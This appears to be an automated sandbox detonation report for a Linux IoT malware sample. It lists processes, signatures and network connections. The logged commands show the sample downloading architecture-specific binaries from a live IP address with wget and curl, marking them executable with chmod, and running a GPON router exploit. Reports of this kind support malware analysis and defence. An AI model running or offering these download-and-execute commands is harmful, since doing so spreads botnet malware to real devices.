[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/bin/cat

[cat m3th.arc]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

Network

Country Destination Domain Proto
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-28 16:40

Reported

2024-07-29 11:10

Platform

debian9-mipsel-20240729-en

Max time kernel

92s

Max time network

93s

Command Line

[/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/g0away /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 N/A

Processes

/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118

[/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/bin/cat

[cat m3th.x86]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0NWNM9]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/bin/cat

[cat m3th.mips]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0NWNM9]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/bin/cat

[cat m3th.mpsl]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0NWNM9]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/bin/cat

[cat m3th.arm]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/bin/cat

[cat m3th.arm5]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/bin/cat

[cat m3th.arm6]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/bin/cat

[cat m3th.arm7]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/bin/cat

[cat m3th.ppc]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/bin/cat

[cat m3th.m68k]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/bin/cat

[cat m3th.spc]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/bin/cat

[cat m3th.i686]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/bin/cat

[cat m3th.sh4]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/bin/cat

[cat m3th.arc]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

Network

Country Destination Domain Proto
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp

Files

N/A